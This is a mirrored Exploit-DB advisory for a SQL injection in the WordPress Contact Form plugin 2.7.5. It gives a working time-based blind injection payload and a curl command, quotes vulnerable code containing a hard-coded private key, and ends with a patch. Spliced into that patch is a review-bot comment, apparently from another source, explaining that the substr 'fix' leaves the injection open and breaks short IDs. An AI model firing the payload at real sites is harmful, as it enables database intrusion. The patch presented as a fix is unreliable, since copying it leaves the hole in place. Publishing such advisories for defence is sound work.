WordPress Plugin Contact Form 2.7.5 – SQL Injection

  • 作者: Skraps
    日期: 2011-10-14
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/17980/
  • # Exploit Title: WordPress Contact Form plugin <= 2.7.5 SQL Injection Vulnerability
    # Date: 2011-10-13
    # Author: Skraps (jackie.craig.sparks(at)live.com jackie.craig.sparks(at)gmail.com @skraps_foo)
    # Software Link: http://downloads.wordpress.org/plugin/contact-form-wordpress.zip
    # Version: 2.7.5 (tested)
    
    ---------------
    PoC (POST data)
    ---------------
    http://www.site.com/wp-content/plugins/contact-form-wordpress/easy-form.class.php 
    wpcf_easyform_submitted=1&wpcf_easyform_test1=testing&wpcf_easyform_formid=1 AND 1=IF(2>1,BENCHMARK(500000000,MD5(CHAR(115,113,108,109,97,112))),0)
     
    e.g.
    curl --data "wpcf_easyform_submitted=1&wpcf_easyform_test1=testing&wpcf_easyform_formid=1 AND 1=IF(2>1,BENCHMARK(500000000,MD5(CHAR(115,113,108,109,97,112))),0)" -H "X-Requested-With:XMLHttpRequest" http://127.0.0.1/wordpress/?p=1
     
    ---------------
    Vulnerable code
    ---------------
    Line 49:
    public function the_content($content) {
    global $wpdb;
    global $table_name;
    global $settings_table_name;
    
    $private_key = '6LdKkr8SAAAAAN3d0B3M_EMh1qx4PeHtOre8loCy';
    
    if ($_POST['wpcf_easyform_submitted'] == 1) {
    
    $form = $wpdb->get_results("SELECT * FROM $table_name WHERE ID = ".$_POST['wpcf_easyform_formid']);
    
    ---------------
    Patch
    ---------------
    
    *** ./easy-form.class.php.orig	2011-10-13 19:53:05.674800956 -0400
    --- ./easy-form.class.php	2011-10-13 19:51:21.442799615 -0400
    ***************
    *** 54,61 ****
    $private_key = '6LdKkr8SAAAAAN3d0B3M_EMh1qx4PeHtOre8loCy';
    
    if ($_POST['wpcf_easyform_submitted'] == 1) {
    ! 
    ! $form = $wpdb->get_results("SELECT * FROM $table_name WHERE ID = ".$_POST['wpcf_easyform_formid']);
    
    $continue = true;
    
    --- 54,63 ----
    $private_key = '6LdKkr8SAAAAAN3d0B3M_EMh1qx4PeHtOre8loCy';
    
    if ($_POST['wpcf_easyform_submitted'] == 1) {
    !	$wpcf_easyform_formid=$_POST['wpcf_easyform_formid'];
    ! $wpcf_easyform_formid=substr($wpcf_easyform_formid,2); 
    ! 
    ! 	$form = $wpdb->get_results("SELECT * FROM $table_name WHERE ID = ".$wpcf_easyform_formid);
    
    $continue = true;
    
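Review bot: The new `substr($wpcf_easyform_formid, 2)` on the `+` side only discards the first two characters of the POSTed value; whatever remains is still concatenated raw into the query on the following `$wpdb->get_results` line, so the injection this advisory describes is not closed, while a short legitimate ID such as `1` is reduced to nothing and the lookup breaks. Coerce the value to an integer and bind it through a placeholder instead: `$wpcf_easyform_formid = absint($_POST['wpcf_easyform_formid']);` and `$form = $wpdb->get_results($wpdb->prepare("SELECT * FROM $table_name WHERE ID = %d", $wpcf_easyform_formid));`. The same unescaped concatenation survives in the second hunk's `WHERE form_id = ".$wpcf_easyform_formid."` query and needs the same treatment. The `$private_key` literal kept as context appears to be a credential committed to source and should be read from plugin settings rather than hard-coded. The enclosing `the_content` method starts and ends outside this hunk.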
    ***************
    *** 71,80 ****
    if ($continue) {
    
    //loop through the fields of this form (read from DB) and build the message here
    ! $form_fields = $wpdb->get_results("
    			SELECT *
    			FROM $settings_table_name
    ! 			WHERE form_id = ".$_POST['wpcf_easyform_formid']."
    			ORDER BY position
    		");
    		
    --- 73,82 ----
    if ($continue) {
    
    //loop through the fields of this form (read from DB) and build the message here
    ! 		$form_fields = $wpdb->get_results("
    			SELECT *
    			FROM $settings_table_name
    ! 			WHERE form_id = ".$wpcf_easyform_formid."
    			ORDER BY position
    		");